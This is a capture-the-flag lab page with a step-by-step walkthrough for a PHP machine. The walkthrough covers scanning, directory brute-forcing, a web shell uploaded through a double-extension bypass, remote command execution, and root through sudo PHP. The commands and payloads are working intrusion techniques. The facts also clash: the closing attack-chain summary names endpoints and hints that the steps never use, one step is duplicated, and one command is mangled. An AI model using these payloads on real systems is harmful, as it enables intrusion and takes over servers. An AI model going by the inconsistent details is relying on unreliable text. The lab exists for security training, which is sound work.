Avatar

Labs / FiPloit

  • Easy
  • Released 01 Jun 2025

📁 Can you exploit file operations to gain system access?

A PHP web application handles file operations and uploads with insufficient security controls. Through careful analysis of file inclusion mechanisms and upload restrictions, skilled attackers can transform seemingly harmless functionality into powerful attack vectors. 🎯 Time to demonstrate file exploitation techniques!

2
Flags
20
Points
Easy
Solution Available
Free Access
Start Lab Environment

Launch your dedicated AWS machine to begin hacking

~1-2 min setup
AWS dedicated
Private instance
Industry standard
Easy

📁 FiPloit - Complete File Upload Bypass and PHP Privilege Escalation Solution

Objective: This easy machine features initial foothold via file upload vulnerability with basic bypass along with easy privilege escalation using PHP as sudo.
🔍 Step 1: Network Reconnaissance

Begin with port scanning to identify running services:

# Port scan reveals HTTP services and SSH
nmap -Pn -sC -sV -p- <target-ip>

# Expected services:
# 22/tcp - SSH
# 80/tcp - HTTP (Status Page)
# 8080/tcp - HTTP (Main PHP Application)

Port 80 shows a status page, port 8080 hosts the main HTTP application, and SSH is available on port 22.

🔍 Step 2: Web Application Analysis and File Enumeration

Explore the web application and perform file enumeration:

# Visit the main application
curl http://<target-ip>:8080

# Perform file enumeration using SecLists raft wordlist
# Note: The application returns 200 for non-existent URLs, so exclude common response length
gobuster dir -u http://<target-ip>:8080 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --exclude-length 2664

# Alternative with common wordlists:
dirsearch -u http://<target-ip>:8080 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://<target-ip>:8080/FUZZ -fs 2664

File enumeration reveals the notes.txt file containing developer notes.

🔍 Step 3: Developer Notes Discovery

Access the discovered notes file to find development information:

# Read the developer notes
curl http://<target-ip>:8080/notes.txt

# Contents reveal:
# Dev Notes:
# - Remove /upload_log_temp4.php before prod
# - Database creds: root:Password123! (change before going live)
# - Fix contact form
# - Disable debug
# - Check Apache conf

The notes.txt file reveals the existence of /upload_log_temp4.php endpoint that should be removed before production.

🔍 Step 4: Developer Portal Access

Access the development endpoint discovered in the notes:

# Access the developer portal mentioned in notes
curl http://<target-ip>:8080/upload_log_temp4.php

# The endpoint provides file upload functionality
# Shows "Developer Portal" with upload feature

The upload_log_temp4.php endpoint contains a developer portal with file upload functionality.

🔍 Step 5: File Upload Vulnerability Discovery

Access the discovered development endpoint and analyze file upload functionality:

# Access the development endpoint
curl http://<target-ip>:8080/upload_log_temp4.php

# Discover file upload feature with restrictions
# Only .txt files are allowed for upload

The file upload feature only allows .txt file extensions, requiring a bypass technique.

🔍 Step 6: File Upload Bypass and Web Shell Deployment

Bypass file upload restrictions using double extension technique:

# Create PHP web shell
cat > shell.txt.php << 'EOF'
<?php system($_GET['cmd']); ?>
EOF

# Upload the web shell using double extension bypass
curl -X POST -F "file=@shell.txt.php" http://<target-ip>:8080/upload_log_temp4.php

# The uploaded webshell has extension: .txt.php

The bypass uses .txt.php extension to circumvent the .txt-only restriction while maintaining PHP execution capability.

🔍 Step 7: Web Shell Access and Command Execution

Locate and access the uploaded web shell:

# Find uploaded files in default upload directory
curl http://<target-ip>:8080/uploads/

# Execute commands through the web shell
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=id"
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=whoami"
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=ls%20-la%20/home"

Uploaded files are stored in /uploads directory, and commands are executed using the ?cmd parameter.

🔍 Step 8: System Enumeration and User Flag Discovery

Use the web shell to enumerate the system and locate flags:

# Enumerate home directories
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=ls%20-la%20/home/ctf"

# Find and read the user flag
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=cat%20/home/ctf/flag-user.txt"

# Discover additional files
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=cat%20/home/ctf/dev_notes.txt"

The user flag is stored in /home/ctf, and dev_notes.txt contains a possible password for SSH access.

🔍 Step 9: SSH Access with Discovered Credentials

Use the password found in dev_notes.txt to gain SSH access:

# SSH login as ctf user
ssh ctf@<target-ip>
# Password from dev_notes.txt file

# Verify access and read user flag directly
cat /home/ctf/flag-user.txt

The ctf user can be accessed via SSH using the password discovered in the dev_notes.txt file.

🔍 Step 10: Privilege Escalation Discovery

Enumerate sudo privileges to identify escalation opportunities:

# Check sudo privileges
sudo -l

# Reveals user can run 3 binaries as sudo:
# /bin/ls, /usr/bin/file, /usr/bin/php
# In alphabetical order: file,ls,php

The sudo -l command reveals that the ctf user can run 3 binaries with sudo privileges: file,ls,php.

🔍 Step 11: PHP Privilege Escalation

Exploit PHP sudo privileges to gain root access:

# Use PHP for privilege escalation
sudo php -r "system('/bin/sh');"

# Alternative command execution
sudo php -r "system('whoami');"
sudo php -r "system('id');"

# Retrieve root flag
cat /root/flag-root.txt

PHP can be used for privilege escalation, and the privilege escalation command is sudo php -r "system('/bin/sh');".

🔍 Step 12: Root Flag Retrieval

With root access, locate and retrieve the root flag:

# Root flag is located at /root/flag-root.txt
find%20/%20-name%20"flag-root.txt"%202>/dev/null
cat /root/flag-root.txt

The root flag is located in /root/flag-root.txt.

🔍 Step 13: Attack Chain Summary

The complete attack chain involves:

  1. Port Scanning: Identify HTTP service on port 8080 and SSH on port 22
  2. Web Analysis: Find hints in HTML comments
  3. Endpoint Discovery: Locate und3r_d3v3l0pm3nt.php via notes.php
  4. Upload Analysis: Identify .txt file restriction
  5. Bypass Technique: Use .txt.php double extension
  6. Web Shell Access: Execute commands via /uploads directory with ?cmd parameter
  7. Credential Discovery: Find SSH password in dev_notes.txt
  8. SSH Access: Login as ctf user
  9. Privilege Enumeration: Discover sudo privileges for file, ls, and php
  10. PHP Exploitation: Use sudo php for privilege escalation
  11. Root Access: Retrieve root flag from /root directory
Key Vulnerabilities: File upload bypass via double extension, weak file restrictions, and overprivileged sudo configuration for PHP execution.
Real-World Application: This challenge demonstrates common web application security issues including insecure file upload mechanisms and dangerous sudo configurations, which are frequently encountered in penetration testing engagements.